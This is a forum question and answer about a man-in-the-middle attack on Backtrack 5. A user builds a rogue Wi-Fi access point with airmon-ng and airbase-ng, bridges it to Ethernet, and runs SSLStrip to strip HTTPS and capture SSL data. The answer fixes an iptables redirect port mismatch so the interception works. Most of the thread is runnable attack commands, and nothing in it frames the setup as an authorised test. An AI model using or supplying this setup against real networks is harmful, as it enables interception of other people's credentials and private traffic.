2

I am having trouble with SSLStrip in a MITM Setup with Backtrack 5. I am using an external wireless card to broadcast the wireless signal, and routing through an Ethernet. I am successfully viewing the packets in Wireshark, however I would like to view SSL data using SSLStrip. These are the preliminary commands I use to set up MITM.

airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0

--new Terminal--

brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward

At this point, I can view packet data in WireShark. I follow these steps to set up SSLStrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080

When I am finished with the session and I open sslstrip.log I do not see any data written to the file. Also, I am unable to access the internet once I do the iptables redirect. Please let me know what you think the problem might be.

Suraj Kulkarni
  • 207
  • 3
  • 6

1 Answers1

6

Assuming sslstrip and arp poisoning are up and running you have a problem with port redirection.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666

redirects http traffic to 127.0.0.1 port 666.

cd /pentest/web/sslstrip
sslstrip -l 8080

starts sslstrip listening for incoming traffic on port 8080

U can either change port redirection to 8080

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

or change the listening port to 666

sslstrip -l 666

maryo
  • 153
  • 1
  • 5